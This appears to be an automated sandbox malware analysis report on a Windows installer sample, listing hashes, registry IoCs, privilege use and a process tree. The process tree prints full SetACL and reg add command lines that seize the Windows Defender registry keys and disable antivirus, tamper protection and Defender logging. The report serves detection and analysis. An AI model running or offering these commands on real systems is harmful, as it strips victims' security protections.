Overview
overview
10Static
static
73f58da2e16...3f.exe
windows7-x64
103f58da2e16...3f.exe
windows10-2004-x64
10$PLUGINSDI...el.dll
windows7-x64
7$PLUGINSDI...el.dll
windows10-2004-x64
7$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$_32_/PowerRun64.exe
windows7-x64
4$_32_/PowerRun64.exe
windows10-2004-x64
3$_32_/SetACL64.exe
windows7-x64
1$_32_/SetACL64.exe
windows10-2004-x64
1$_32_/cabw...ws.exe
windows7-x64
1$_32_/cabw...ws.exe
windows10-2004-x64
1$_32_/p64.bat
windows7-x64
10$_32_/p64.bat
windows10-2004-x64
10$_32_/win_...rp.exe
windows7-x64
1$_32_/win_...rp.exe
windows10-2004-x64
1Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
12/07/2024, 07:47
Behavioral task
behavioral1
Sample
3f58da2e1652dddab53995166f24993f.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
3f58da2e1652dddab53995166f24993f.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
$_32_/PowerRun64.exe
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
$_32_/PowerRun64.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral9
Sample
$_32_/SetACL64.exe
Resource
win7-20240704-en
Behavioral task
behavioral10
Sample
$_32_/SetACL64.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral11
Sample
$_32_/cabweejcuqvpws.exe
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
$_32_/cabweejcuqvpws.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral13
Sample
$_32_/p64.bat
Resource
win7-20240704-en
Behavioral task
behavioral14
Sample
$_32_/p64.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral15
Sample
$_32_/win_version_csharp.exe
Resource
win7-20240705-en
Behavioral task
behavioral16
Sample
$_32_/win_version_csharp.exe
Resource
win10v2004-20240709-en
General
-
Target
3f58da2e1652dddab53995166f24993f.exe
-
Size
877KB
-
MD5
3f58da2e1652dddab53995166f24993f
-
SHA1
1721c19909c2309398d5174f9fcb2abcff51e862
-
SHA256
d14ee261ed6c5dddc1900587c455991defe0f49c1da1172d7f8f1e163309d3e8
-
SHA512
ece1950851e0724f465471cfd50021f0c13642f66753c56bb77c91e6db972032ce272286f2d51f5c87edb61b806cd8a21458286f8bd1b799821526966b10dca1
-
SSDEEP
24576:MGxOacf/CoFPz8s43+ae4Y9hJ9HFtMr6lLwLkM0VP90ef2:XxyCoZz943+YaJNFtM+5wL3AP912
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe -
Modifies security service 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" reg.exe -
Executes dropped EXE 57 IoCs
pid Process 2704 SetACL64.exe 2720 SetACL64.exe 2812 SetACL64.exe 2804 SetACL64.exe 2744 SetACL64.exe 3004 SetACL64.exe 2644 SetACL64.exe 1196 SetACL64.exe 1292 PowerRun64.exe 2160 PowerRun64.exe 988 PowerRun64.exe 2460 PowerRun64.exe 1860 PowerRun64.exe 2540 PowerRun64.exe 2356 PowerRun64.exe 1536 PowerRun64.exe 1504 PowerRun64.exe 3008 PowerRun64.exe 2844 PowerRun64.exe 2876 PowerRun64.exe 2788 PowerRun64.exe 2192 PowerRun64.exe 2968 PowerRun64.exe 2932 PowerRun64.exe 1988 PowerRun64.exe 2144 PowerRun64.exe 1020 PowerRun64.exe 3028 PowerRun64.exe 2372 PowerRun64.exe 952 PowerRun64.exe 1652 PowerRun64.exe 1960 PowerRun64.exe 1208 PowerRun64.exe 1096 PowerRun64.exe 2512 PowerRun64.exe 2816 PowerRun64.exe 2160 PowerRun64.exe 2744 PowerRun64.exe 2612 PowerRun64.exe 2684 PowerRun64.exe 2096 PowerRun64.exe 2700 PowerRun64.exe 1008 PowerRun64.exe 2616 PowerRun64.exe 2064 PowerRun64.exe 1912 PowerRun64.exe 2236 PowerRun64.exe 2056 PowerRun64.exe 1344 PowerRun64.exe 352 PowerRun64.exe 2436 PowerRun64.exe 1576 PowerRun64.exe 2336 PowerRun64.exe 2548 PowerRun64.exe 2720 PowerRun64.exe 2860 PowerRun64.exe 2740 win_version_csharp.exe -
Loads dropped DLL 28 IoCs
pid Process 1640 3f58da2e1652dddab53995166f24993f.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 844 Process not Found 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 2380 cmd.exe 1640 3f58da2e1652dddab53995166f24993f.exe 1640 3f58da2e1652dddab53995166f24993f.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Signature Updates SetACL64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Signature Updates SetACL64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\UX Configuration SetACL64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\UX Configuration SetACL64.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Logs\CBS\CbsPersist_20240712074711.cab makecab.exe -
pid Process 2824 powershell.exe 2628 powershell.exe 1420 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 48 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PowerRun64.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1292 PowerRun64.exe 1292 PowerRun64.exe 988 PowerRun64.exe 988 PowerRun64.exe 2160 PowerRun64.exe 2160 PowerRun64.exe 1860 PowerRun64.exe 1860 PowerRun64.exe 2460 PowerRun64.exe 2460 PowerRun64.exe 2356 PowerRun64.exe 2356 PowerRun64.exe 1536 PowerRun64.exe 1536 PowerRun64.exe 2844 PowerRun64.exe 2844 PowerRun64.exe 2788 PowerRun64.exe 2788 PowerRun64.exe 2192 PowerRun64.exe 2192 PowerRun64.exe 2968 PowerRun64.exe 2968 PowerRun64.exe 2144 PowerRun64.exe 2144 PowerRun64.exe 1988 PowerRun64.exe 1988 PowerRun64.exe 3028 PowerRun64.exe 3028 PowerRun64.exe 2372 PowerRun64.exe 2372 PowerRun64.exe 1020 PowerRun64.exe 1020 PowerRun64.exe 1208 PowerRun64.exe 1208 PowerRun64.exe 1096 PowerRun64.exe 1096 PowerRun64.exe 2512 PowerRun64.exe 2512 PowerRun64.exe 2160 PowerRun64.exe 2160 PowerRun64.exe 2612 PowerRun64.exe 2612 PowerRun64.exe 2684 PowerRun64.exe 2684 PowerRun64.exe 2096 PowerRun64.exe 2096 PowerRun64.exe 2616 PowerRun64.exe 2616 PowerRun64.exe 1008 PowerRun64.exe 1008 PowerRun64.exe 1912 PowerRun64.exe 1912 PowerRun64.exe 2056 PowerRun64.exe 2056 PowerRun64.exe 2064 PowerRun64.exe 2064 PowerRun64.exe 1344 PowerRun64.exe 1344 PowerRun64.exe 1576 PowerRun64.exe 1576 PowerRun64.exe 2336 PowerRun64.exe 2336 PowerRun64.exe 2720 PowerRun64.exe 2720 PowerRun64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeBackupPrivilege 2704 SetACL64.exe Token: SeRestorePrivilege 2704 SetACL64.exe Token: SeTakeOwnershipPrivilege 2704 SetACL64.exe Token: SeBackupPrivilege 2720 SetACL64.exe Token: SeRestorePrivilege 2720 SetACL64.exe Token: SeTakeOwnershipPrivilege 2720 SetACL64.exe Token: SeBackupPrivilege 2812 SetACL64.exe Token: SeRestorePrivilege 2812 SetACL64.exe Token: SeTakeOwnershipPrivilege 2812 SetACL64.exe Token: SeBackupPrivilege 2804 SetACL64.exe Token: SeRestorePrivilege 2804 SetACL64.exe Token: SeTakeOwnershipPrivilege 2804 SetACL64.exe Token: SeBackupPrivilege 2744 SetACL64.exe Token: SeRestorePrivilege 2744 SetACL64.exe Token: SeTakeOwnershipPrivilege 2744 SetACL64.exe Token: SeBackupPrivilege 3004 SetACL64.exe Token: SeRestorePrivilege 3004 SetACL64.exe Token: SeTakeOwnershipPrivilege 3004 SetACL64.exe Token: SeBackupPrivilege 2644 SetACL64.exe Token: SeRestorePrivilege 2644 SetACL64.exe Token: SeTakeOwnershipPrivilege 2644 SetACL64.exe Token: SeBackupPrivilege 1196 SetACL64.exe Token: SeRestorePrivilege 1196 SetACL64.exe Token: SeTakeOwnershipPrivilege 1196 SetACL64.exe Token: SeDebugPrivilege 1292 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 1292 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 1292 PowerRun64.exe Token: 0 1292 PowerRun64.exe Token: SeDebugPrivilege 2160 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2160 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2160 PowerRun64.exe Token: SeDebugPrivilege 988 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 988 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 988 PowerRun64.exe Token: 0 988 PowerRun64.exe Token: SeDebugPrivilege 1860 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 1860 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 1860 PowerRun64.exe Token: 0 1860 PowerRun64.exe Token: SeDebugPrivilege 2460 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2460 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2460 PowerRun64.exe Token: SeDebugPrivilege 2356 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2356 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2356 PowerRun64.exe Token: SeDebugPrivilege 1536 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 1536 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 1536 PowerRun64.exe Token: 0 1536 PowerRun64.exe Token: SeDebugPrivilege 2844 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2844 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2844 PowerRun64.exe Token: SeDebugPrivilege 2788 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2788 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2788 PowerRun64.exe Token: 0 2788 PowerRun64.exe Token: SeDebugPrivilege 2192 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2192 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2192 PowerRun64.exe Token: SeDebugPrivilege 2968 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2968 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2968 PowerRun64.exe Token: 0 2968 PowerRun64.exe Token: SeDebugPrivilege 1988 PowerRun64.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1640 wrote to memory of 2380 1640 3f58da2e1652dddab53995166f24993f.exe 30 PID 1640 wrote to memory of 2380 1640 3f58da2e1652dddab53995166f24993f.exe 30 PID 1640 wrote to memory of 2380 1640 3f58da2e1652dddab53995166f24993f.exe 30 PID 1640 wrote to memory of 2380 1640 3f58da2e1652dddab53995166f24993f.exe 30 PID 2380 wrote to memory of 2704 2380 cmd.exe 32 PID 2380 wrote to memory of 2704 2380 cmd.exe 32 PID 2380 wrote to memory of 2704 2380 cmd.exe 32 PID 2380 wrote to memory of 2704 2380 cmd.exe 32 PID 2380 wrote to memory of 2720 2380 cmd.exe 193 PID 2380 wrote to memory of 2720 2380 cmd.exe 193 PID 2380 wrote to memory of 2720 2380 cmd.exe 193 PID 2380 wrote to memory of 2720 2380 cmd.exe 193 PID 2380 wrote to memory of 2812 2380 cmd.exe 34 PID 2380 wrote to memory of 2812 2380 cmd.exe 34 PID 2380 wrote to memory of 2812 2380 cmd.exe 34 PID 2380 wrote to memory of 2812 2380 cmd.exe 34 PID 2380 wrote to memory of 2804 2380 cmd.exe 35 PID 2380 wrote to memory of 2804 2380 cmd.exe 35 PID 2380 wrote to memory of 2804 2380 cmd.exe 35 PID 2380 wrote to memory of 2804 2380 cmd.exe 35 PID 2380 wrote to memory of 2744 2380 cmd.exe 36 PID 2380 wrote to memory of 2744 2380 cmd.exe 36 PID 2380 wrote to memory of 2744 2380 cmd.exe 36 PID 2380 wrote to memory of 2744 2380 cmd.exe 36 PID 2380 wrote to memory of 3004 2380 cmd.exe 37 PID 2380 wrote to memory of 3004 2380 cmd.exe 37 PID 2380 wrote to memory of 3004 2380 cmd.exe 37 PID 2380 wrote to memory of 3004 2380 cmd.exe 37 PID 2380 wrote to memory of 2644 2380 cmd.exe 38 PID 2380 wrote to memory of 2644 2380 cmd.exe 38 PID 2380 wrote to memory of 2644 2380 cmd.exe 38 PID 2380 wrote to memory of 2644 2380 cmd.exe 38 PID 2380 wrote to memory of 1196 2380 cmd.exe 39 PID 2380 wrote to memory of 1196 2380 cmd.exe 39 PID 2380 wrote to memory of 1196 2380 cmd.exe 39 PID 2380 wrote to memory of 1196 2380 cmd.exe 39 PID 2380 wrote to memory of 2656 2380 cmd.exe 40 PID 2380 wrote to memory of 2656 2380 cmd.exe 40 PID 2380 wrote to memory of 2656 2380 cmd.exe 40 PID 2380 wrote to memory of 2656 2380 cmd.exe 40 PID 2380 wrote to memory of 2724 2380 cmd.exe 41 PID 2380 wrote to memory of 2724 2380 cmd.exe 41 PID 2380 wrote to memory of 2724 2380 cmd.exe 41 PID 2380 wrote to memory of 2724 2380 cmd.exe 41 PID 2380 wrote to memory of 2608 2380 cmd.exe 42 PID 2380 wrote to memory of 2608 2380 cmd.exe 42 PID 2380 wrote to memory of 2608 2380 cmd.exe 42 PID 2380 wrote to memory of 2608 2380 cmd.exe 42 PID 2380 wrote to memory of 2604 2380 cmd.exe 43 PID 2380 wrote to memory of 2604 2380 cmd.exe 43 PID 2380 wrote to memory of 2604 2380 cmd.exe 43 PID 2380 wrote to memory of 2604 2380 cmd.exe 43 PID 2380 wrote to memory of 2624 2380 cmd.exe 44 PID 2380 wrote to memory of 2624 2380 cmd.exe 44 PID 2380 wrote to memory of 2624 2380 cmd.exe 44 PID 2380 wrote to memory of 2624 2380 cmd.exe 44 PID 2380 wrote to memory of 2640 2380 cmd.exe 45 PID 2380 wrote to memory of 2640 2380 cmd.exe 45 PID 2380 wrote to memory of 2640 2380 cmd.exe 45 PID 2380 wrote to memory of 2640 2380 cmd.exe 45 PID 2380 wrote to memory of 2668 2380 cmd.exe 46 PID 2380 wrote to memory of 2668 2380 cmd.exe 46 PID 2380 wrote to memory of 2668 2380 cmd.exe 46 PID 2380 wrote to memory of 2668 2380 cmd.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\3f58da2e1652dddab53995166f24993f.exe"C:\Users\Admin\AppData\Local\Temp\3f58da2e1652dddab53995166f24993f.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\p64.bat2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"3⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"3⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"3⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Users\Admin\AppData\Local\Temp\nsdB848.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"3⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f3⤵PID:2656
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f3⤵PID:2724
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f3⤵PID:2608
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f3⤵PID:2604
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f3⤵PID:2624
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f3⤵PID:2640
